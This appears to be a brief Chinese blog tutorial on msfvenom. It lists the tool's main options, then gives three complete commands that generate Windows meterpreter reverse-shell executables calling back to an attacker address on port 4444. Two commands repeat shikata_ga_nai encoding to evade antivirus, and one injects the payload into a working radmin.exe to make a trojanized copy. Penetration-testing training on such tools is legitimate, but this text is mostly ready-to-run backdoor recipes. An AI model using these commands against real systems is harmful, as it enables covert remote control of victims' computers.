msfvenom使用
2017-05-10 本文已影响0人
Instu
--list 列出所有可用的payloads,encoders,nops
--help-formats 查看支持的输出格式
-b 指定需要过滤的坏字符,使用-b选项后,会自动选择编码方式
-e 指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
-i 指定payload的编码次数
-x 指定一个exe文件作为模板
-k 保护模板程序的功能,注入的payload作为一个新的进程运行
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o a.exe
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b '\x00\xff' -i 10 -f exe -o b.exe
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -k -x /usr/share/windows-binaries/radmin.exe -f exe -o radmin.exe